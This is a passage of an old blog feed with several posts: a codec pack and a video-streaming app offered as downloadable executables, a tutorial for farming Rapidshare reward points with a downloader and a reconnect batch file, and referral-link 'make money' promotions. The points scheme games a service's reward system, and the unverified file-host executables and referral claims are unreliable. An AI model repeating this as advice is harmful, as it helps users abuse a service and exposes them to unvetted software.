/&gt;PLAYS ALMOST ANY VIDEO FILE YOU HAVE, YOU CAN PLAY YOUR .MKV FILES IN MEDIA PLAYER CLASSIC AND ALSO MOST OTHER VIDEO FORMATS TOO!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 102, 0);"&gt;Download link :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt; http://rapidshare.com/files/51446610/Combined-Community-Codec-Pack-2007-07-22.exe&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8536732718748266398?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8536732718748266398/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8536732718748266398' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8536732718748266398'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8536732718748266398'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/06/play-almost-anyany-format-files-in.html' title='PLAY almost any(any format) FILES IN MEDIA PLAYER'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5819847009881836628</id><published>2008-06-27T01:02:00.000-07:00</published><updated>2008-06-27T01:36:00.781-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Free movies'/><title type='text'>Watch Movies Over the Internet or by Downloading FREE</title><content type='html'>This program is one if not the best movie software i have found been using it now for about 1 day and thought i would post up here for all you lot.&lt;br /&gt;&lt;br /&gt;Worth a download because its really good.&lt;br /&gt;&lt;br /&gt;more info below :-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;The easiest and fastest way to watch full-length videos online. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# Access to over 130,000 videos&lt;br /&gt;# Full-length, full-resolution files&lt;br /&gt;# High-Definition video support&lt;br /&gt;# Faster than peer-to-peer&lt;br /&gt;# Integrated playback&lt;br /&gt;# Free to download and use&lt;br /&gt;# Contains no spyware or adware&lt;br /&gt;# Easy installation and setup&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; Streaming Video Playback &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  * Instant access to over 130,000 videos&lt;br /&gt;  * Full-resolution, full-length files&lt;br /&gt;  * Forget BitTorrent, Graboid Video features little-to-no waiting for video playback&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; Downloading &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  * Download any video in our database for viewing or burning later&lt;br /&gt;  * High-definition video files are available&lt;br /&gt;  * Max-out your connection with the fastest download speeds anywhere&lt;br /&gt;&lt;br /&gt;Integrated Playback&lt;br /&gt;&lt;br /&gt;  * Play video files directly within the application&lt;br /&gt;  * Full-screen, high-resolution playback&lt;br /&gt;  * Crystal-clear digital audio&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; Full Web Integration &lt;/span&gt;&lt;br /&gt;  * View details on your favorite videos directly within Graboid Video&lt;br /&gt;  * Participate in discussions and get support with built-in community forums&lt;br /&gt;  * Manage your account details without ever leaving Graboid Video&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSgT1tL7vI/AAAAAAAAAD8/uvgn7ktjG-s/s1600-h/Playback.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSgT1tL7vI/AAAAAAAAAD8/uvgn7ktjG-s/s400/Playback.jpg" alt="" id="BLOGGER_PHOTO_ID_5216470531096440562" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSg75NiyWI/AAAAAAAAAEE/cLv_P15QpEc/s1600-h/Listings.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSg75NiyWI/AAAAAAAAAEE/cLv_P15QpEc/s400/Listings.JPG" alt="" id="BLOGGER_PHOTO_ID_5216471219232229730" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To download :-&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 102, 0);"&gt;Download links :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://www.graboid.com/downloads/GraboidVideoSetup.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To go to website :-&lt;br /&gt; &lt;span style="color: rgb(51, 51, 255);"&gt;http://www.graboid.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enjoy-.-.-.-.-.-.--.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="line-height: normal;font-size:24;" &gt;PLEASE LEAVE COMMENTS&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5819847009881836628?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5819847009881836628/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5819847009881836628' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5819847009881836628'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5819847009881836628'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/06/watch-movies-over-internet-or-by.html' title='Watch Movies Over the Internet or by Downloading FREE'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Osu6Fdz0VN0/SGSgT1tL7vI/AAAAAAAAAD8/uvgn7ktjG-s/s72-c/Playback.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-9017071294536542242</id><published>2008-06-27T00:24:00.000-07:00</published><updated>2008-06-27T01:32:39.877-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rapidshare'/><title type='text'>Earn up to 47100 RS points Each Month with 3 programs</title><content type='html'>well firstly i think its not a new idea...but im sure no 1 tried it before...&lt;br /&gt;anyway, the thing is that we make a new account on rapidshare...(collectors account) for those who doesn't have premium account...therefore, the premium users can use their premium accounts to do this also to get free points....&lt;br /&gt;after u create new account..upload one file...&lt;br /&gt;the size must b at least 1Mb..(make it 1mb)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSZmSF9l1I/AAAAAAAAACY/IkC3tLrZxVI/s1600-h/7963363b9909e485013987c5787bf041ad91e2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSZmSF9l1I/AAAAAAAAACY/IkC3tLrZxVI/s400/7963363b9909e485013987c5787bf041ad91e2.jpg" alt="" id="BLOGGER_PHOTO_ID_5216463151372801874" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Now follow these pix:-&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSaU8Df3AI/AAAAAAAAACo/BV9CtvUu-6I/s1600-h/1162786f8d538e23e5a469b38e5afb84d3643c0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSaU8Df3AI/AAAAAAAAACo/BV9CtvUu-6I/s400/1162786f8d538e23e5a469b38e5afb84d3643c0.jpg" alt="" id="BLOGGER_PHOTO_ID_5216463952910736386" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSaF4NqlYI/AAAAAAAAACg/MYPBMkKWm18/s1600-h/11627879a537d11f3226f1f95d203d06a27240e.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSaF4NqlYI/AAAAAAAAACg/MYPBMkKWm18/s400/11627879a537d11f3226f1f95d203d06a27240e.jpg" alt="" id="BLOGGER_PHOTO_ID_5216463694181602690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;then Download USDownloader from here: (about 5Mbs)&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt;Download link: &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 51, 255);"&gt;http://rapidshare.com/files/109867782/USDownloader-Lite_24-4-2008_.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 0, 51);"&gt;Program 1 &gt;&gt;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;download the batch from here:-&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 102, 0);"&gt;Download link:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://rapidshare.com/files/87595417/reconnect_delete_temp_files.rar.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;firstly extract Reconnect_delete_temp_files.rar...&lt;br /&gt;for dialing-up users (broadband and all dialing-up users,and all users that use username/pass to connect to internet )&lt;br /&gt;u can only use this batch file 2 reconnect ur connection..&lt;br /&gt;its so fast, u can reconnect in 3 seconds maximum..&lt;br /&gt;all u do is there r 2 files 1 for deleting the temp files...u can just add it to ur scheduler..&lt;br /&gt;the other file is reconnecter...&lt;br /&gt;now follow these Instructions:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1-open the batch file by right click on the icon =&gt; EDIT..&lt;br /&gt;now do these instructions:-&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSbZMOHQiI/AAAAAAAAAC4/ypwCXh86_Lo/s1600-h/876649489c283fae2fcb88b45fb4780c938248.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSbZMOHQiI/AAAAAAAAAC4/ypwCXh86_Lo/s400/876649489c283fae2fcb88b45fb4780c938248.jpg" alt="" id="BLOGGER_PHOTO_ID_5216465125481333282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 51, 255);"&gt;&lt;span style="color: rgb(51, 0, 51);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSbJ3dgi7I/AAAAAAAAACw/SVwYslu5PS4/s1600-h/1162628aa32fc14de83ebd4b15a85a0bf57bd56.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSbJ3dgi7I/AAAAAAAAACw/SVwYslu5PS4/s400/1162628aa32fc14de83ebd4b15a85a0bf57bd56.jpg" alt="" id="BLOGGER_PHOTO_ID_5216464862210722738" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NOw open USDownloader...&lt;br /&gt;2- go 2 options and do this&lt;br /&gt;in main&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSb5QnithI/AAAAAAAAADA/ixZXnt3dklQ/s1600-h/7963417c2e0bdaa05a99f6dc1648934b816213.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSb5QnithI/AAAAAAAAADA/ixZXnt3dklQ/s400/7963417c2e0bdaa05a99f6dc1648934b816213.jpg" alt="" id="BLOGGER_PHOTO_ID_5216465676417545746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;in settings&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_Osu6Fdz0VN0/SGScR95PwTI/AAAAAAAAADI/UYr_NAG3MLI/s1600-h/796343fe511b2e497a1fb3f962ff26aafec391.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_Osu6Fdz0VN0/SGScR95PwTI/AAAAAAAAADI/UYr_NAG3MLI/s400/796343fe511b2e497a1fb3f962ff26aafec391.jpg" alt="" id="BLOGGER_PHOTO_ID_5216466100888256818" border="0" /&gt;&lt;/a&gt; 3- now go to scheduler&lt;br /&gt;&lt;br /&gt;press add&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_Osu6Fdz0VN0/SGScmRR-FII/AAAAAAAAADQ/V9dzONcOqVE/s1600-h/897314cc0ee6c6e75b98d4e9e50c731899f47c.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_Osu6Fdz0VN0/SGScmRR-FII/AAAAAAAAADQ/V9dzONcOqVE/s400/897314cc0ee6c6e75b98d4e9e50c731899f47c.jpg" alt="" id="BLOGGER_PHOTO_ID_5216466449689613442" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_Osu6Fdz0VN0/SGSc24L1f_I/AAAAAAAAADY/tS7hnVnwIjA/s1600-h/8973157672fc36c2260322fa7c019da076953a.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_Osu6Fdz0VN0/SGSc24L1f_I/AAAAAAAAADY/tS7hnVnwIjA/s400/8973157672fc36c2260322fa7c019da076953a.jpg" alt="" id="BLOGGER_PHOTO_ID_5216466735010775026" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;another task for getting ur links automatically&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSdURCkjsI/AAAAAAAAADg/Paa3915KGhI/s1600-h/1162733362f009b50c7fbc218f2d84c9ec10925.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSdURCkjsI/AAAAAAAAADg/Paa3915KGhI/s400/1162733362f009b50c7fbc218f2d84c9ec10925.jpg" alt="" id="BLOGGER_PHOTO_ID_5216467239899008706" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;last task for deleting temp files..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSdzR92-kI/AAAAAAAAADo/giJY1AzXiMk/s1600-h/8973164cffa7527407ccc0a4a6d55b80806781.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_Osu6Fdz0VN0/SGSdzR92-kI/AAAAAAAAADo/giJY1AzXiMk/s400/8973164cffa7527407ccc0a4a6d55b80806781.jpg" alt="" id="BLOGGER_PHOTO_ID_5216467772723624514" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSeI5-m2pI/AAAAAAAAADw/sQ1MhSb8hkg/s1600-h/897317362034cdc552cd774e59a967b5d8d0e9.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_Osu6Fdz0VN0/SGSeI5-m2pI/AAAAAAAAADw/sQ1MhSb8hkg/s400/897317362034cdc552cd774e59a967b5d8d0e9.jpg" alt="" id="BLOGGER_PHOTO_ID_5216468144241433234" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now just press OK and thats all...&lt;br /&gt;anyway, at this moment u can paste ur link inside the "usdownloader" and start to get ur own points.&lt;br /&gt;to delete all the temp files automatically just add new task in scheduler&lt;br /&gt;then add this file..called "Delete Temp Files"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 102, 0);"&gt;Download link:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://rapidshare.com/files/75555097/Reconnect_delete_temp_files.rar.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;cheers!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-9017071294536542242?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/9017071294536542242/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=9017071294536542242' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/9017071294536542242'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/9017071294536542242'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/06/earn-up-to-47100-rs-points-each-month.html' title='Earn up to 47100 RS points Each Month with 3 programs'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Osu6Fdz0VN0/SGSZmSF9l1I/AAAAAAAAACY/IkC3tLrZxVI/s72-c/7963363b9909e485013987c5787bf041ad91e2.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6330943340125300298</id><published>2008-05-23T21:34:00.002-07:00</published><updated>2008-05-23T23:19:44.076-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Make money'/><title type='text'>Make money :Earn dollars $$ for search Join Mysearchfunds:  Payemnts proof</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_Osu6Fdz0VN0/SDed5dikKPI/AAAAAAAAABk/_4GFi7jRrDk/s400/banner.gif" alt="" id="BLOGGER_PHOTO_ID_5203801504957606130" border="0" /&gt;&lt;/a&gt;&lt;a href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;span style="color: rgb(0, 0, 153);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;Click here to join now&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;MySearchFunds&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;here is yet another Paid to Search site with &lt;a href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(51, 51, 255);"&gt;Ask, Yahoo, Live, and Google &lt;/span&gt;&lt;/a&gt;running behind it. They share 50% of the advertising revenue generated, with their members.&lt;br /&gt;&lt;br /&gt;In order to use it, you need to have either Internet Explorer 7 installed or Mozilla Firefox installed. You can download them from a link on their site.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;Payment Proof Below:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;It actually pays,i recently got paid for my searches it is a wonderful site , i have it as my homepage you don't have to install nothing.&lt;br /&gt;&lt;br /&gt;for each search, you get your £ 0.03 about $ 0.06!&lt;br /&gt;&lt;a href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Click here to join now&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here are the details:&lt;br /&gt;&lt;br /&gt;1. Cash out at 2o$ minimum.&lt;br /&gt;2. Just search like you would search on &lt;a href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;Google.&lt;/a&gt;&lt;br /&gt;3. They recently added Google as a search engine.&lt;br /&gt;   5. You don't got nothing to lose.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_Osu6Fdz0VN0/SDedFtikKOI/AAAAAAAAABc/NFfsjaWJcQQ/s400/007928328.jpg" alt="" id="BLOGGER_PHOTO_ID_5203800615899375842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.mysearchfunds.co.uk/apply001.asp?Friend=79498"&gt;&lt;span style="color: rgb(51, 51, 255);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;Click here to join now&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6330943340125300298?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6330943340125300298/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6330943340125300298' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6330943340125300298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6330943340125300298'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/make-money-earn-dollars-for-search-join.html' title='Make money :Earn dollars $$ for search Join Mysearchfunds:  Payemnts proof'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Osu6Fdz0VN0/SDed5dikKPI/AAAAAAAAABk/_4GFi7jRrDk/s72-c/banner.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8339540408686935074</id><published>2008-05-23T21:13:00.000-07:00</published><updated>2008-05-23T21:33:45.848-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Make money'/><title type='text'>Make money : Earn $$ join myLot : Payment proofs</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_Osu6Fdz0VN0/SDeafdikKNI/AAAAAAAAABU/J0FhiZuUL9E/s400/Mylot" alt="" id="BLOGGER_PHOTO_ID_5203797759746123986" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;why you should join myLot&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;We've heard reports of many myLot users who spend most of the waking hours of any given day enjoying myLot.&lt;br /&gt;&lt;br /&gt;"Nothing can be that interesting?" you might ask.&lt;br /&gt;&lt;br /&gt;Well, then you've probably never experienced a place like myLot.&lt;br /&gt;&lt;br /&gt;It can be addicting enough to kill days on end, but also functional and useful enough for the millions of internet users who only have a few precious moments in their busy days for "online time."&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Join by clicking here &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt; --------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0); font-weight: bold;"&gt;customize your internet experience&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;View the latest discussions, news, and blog postings all tailored to your interests and personal experience on myLot.&lt;br /&gt;&lt;br /&gt;Make myLot your default home page and take advantage of everything myLot has to offer. Oh yeah, we have the weather too!&lt;br /&gt;participate in discussions&lt;br /&gt;Discuss topics about anything and everything under the sun.&lt;br /&gt;&lt;br /&gt;Join one of the hundreds of thousands of discussions already started by our members, or start your own! We guarantee you'll find many others who share your interests.&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;&lt;br /&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;Join by clicking here &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;Ahh, it's fun to be a fast growing community!&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;make money&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Did we mention that you get paid (cash!) for your valuable contributions here?&lt;br /&gt;&lt;br /&gt;That's the best part of myLot for many users.&lt;br /&gt;&lt;br /&gt;Learn about the earnings program and find out how you can earn some extra spendng money.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Join by clicking here &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;build a profile&lt;/span&gt;&lt;br /&gt;myLot users can express themselves with their own personal profile page. Every myLot user has one!&lt;br /&gt;&lt;br /&gt;It's kind of like MySpace, only much cleaner.&lt;br /&gt;Share photos with your friends and family.&lt;br /&gt;&lt;br /&gt;Your profile is completely customized to your style, so let the world know what you're all about!&lt;br /&gt;&lt;br /&gt;communicate with and make new friends&lt;br /&gt;myLot has built-in private messaging which is a great way to communicate with your friends. It's 100% spam-free because YOU choose who can send you messages.&lt;br /&gt;&lt;br /&gt;Only users who are on your "friends" list (which you have 100% control over) can send you a private message.&lt;br /&gt;&lt;br /&gt;&lt;br 